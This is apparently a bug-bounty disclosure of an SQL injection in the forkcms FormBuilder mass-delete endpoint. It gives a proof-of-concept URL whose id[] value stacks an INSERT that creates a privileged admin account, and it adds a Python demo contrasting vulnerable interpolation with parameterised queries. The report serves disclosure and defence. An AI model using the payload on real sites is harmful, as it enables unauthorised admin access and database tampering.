SQL Injection in forkcms/forkcms
Valid
Reported on Oct 30th 2021
Description
When deleting submissions that belong to a form (built with the FormBuilder module), the parameter id[] is vulnerable to SQL injection.
Proof of Concept
- Call the URL http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
- To test this URL successfully, you need a valid form with some submissions. You might have to adjust the parameter form_id to another value.
- After calling this URL, there is a new entry in the users table.
Impact
The attacker can tamper with data in the database as they want.
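As an added illustration (not forkcms's own code), the two ways a mass-action handler can build the DELETE for the id[] list: interpolating the raw values, which lets the stacked INSERT from the PoC run, and the hardened form that rejects anything but integers and binds placeholders. The schema and the form_data table name are constructed stand-ins; only users(email, password, is_god) comes from the report.

```python
import re
import sqlite3

# Constructed schema standing in for the affected CMS; the form_data table is an
# assumption, users(email, password, is_god) is the table named in the report.
SCHEMA = """
CREATE TABLE form_data (id INTEGER PRIMARY KEY, form_id INTEGER);
CREATE TABLE users (email TEXT, password TEXT, is_god INTEGER);
INSERT INTO form_data VALUES (1, 2), (2, 2), (3, 2), (4, 5);
"""

# Constructed request values: a normal id[] list and one mirroring the PoC,
# where the first entry closes the IN (...) list and stacks an INSERT.
BENIGN_IDS = ["3", "1"]
PAYLOAD_IDS = ["3);insert into users(email,password,is_god) "
               "values ('attacker@example.com','x',1);--"]

_INT = re.compile(r"[0-9]+")

def vulnerable_delete_sql(form_id, ids):
    """The defective pattern: request values interpolated straight into SQL."""
    return f"DELETE FROM form_data WHERE form_id = {form_id} AND id IN ({','.join(ids)})"

def safe_delete(conn, form_id, ids):
    """Hardened handler: every id[] entry must be a decimal integer and the
    statement carries only placeholders; returns the number of rows deleted."""
    if not ids or not all(isinstance(v, str) and _INT.fullmatch(v) for v in ids):
        raise ValueError("id[] must contain only integers")
    placeholders = ",".join("?" * len(ids))
    sql = f"DELETE FROM form_data WHERE form_id = ? AND id IN ({placeholders})"
    cur = conn.execute(sql, [int(form_id), *[int(v) for v in ids]])
    conn.commit()
    return cur.rowcount

def run(ids, use_safe):
    """Replay one request against a fresh in-memory DB; returns
    (submissions deleted, users rows afterwards, request rejected?)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    count = lambda table: conn.execute(f"SELECT count(*) FROM {table}").fetchone()[0]
    try:
        if use_safe:
            deleted = safe_delete(conn, "2", ids)
        else:
            before = count("form_data")
            # executescript runs every statement in the string, as a driver
            # that permits stacked queries would.
            conn.executescript(vulnerable_delete_sql("2", ids))
            deleted = before - count("form_data")
    except ValueError:
        return 0, count("users"), True
    return deleted, count("users"), False
```

The first call reproduces the report's effect (one submission deleted, one new users row); the second shows the same request rejected before any SQL runs.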
We have contacted a member of the forkcms team and are waiting to hear back
2 years ago
We have sent a follow up to the forkcms team. We will try again in 7 days.
2 years ago
We have sent a second follow up to the forkcms team. We will try again in 10 days.
2 years ago
We have sent a third and final follow up to the forkcms team. This report is now considered stale.
2 years ago
csrf token fails and blocks this
The disclosure bounty has been dropped
The fix bounty has been dropped
sorry, I was wrong, it is valid, I'll ask to reopen this one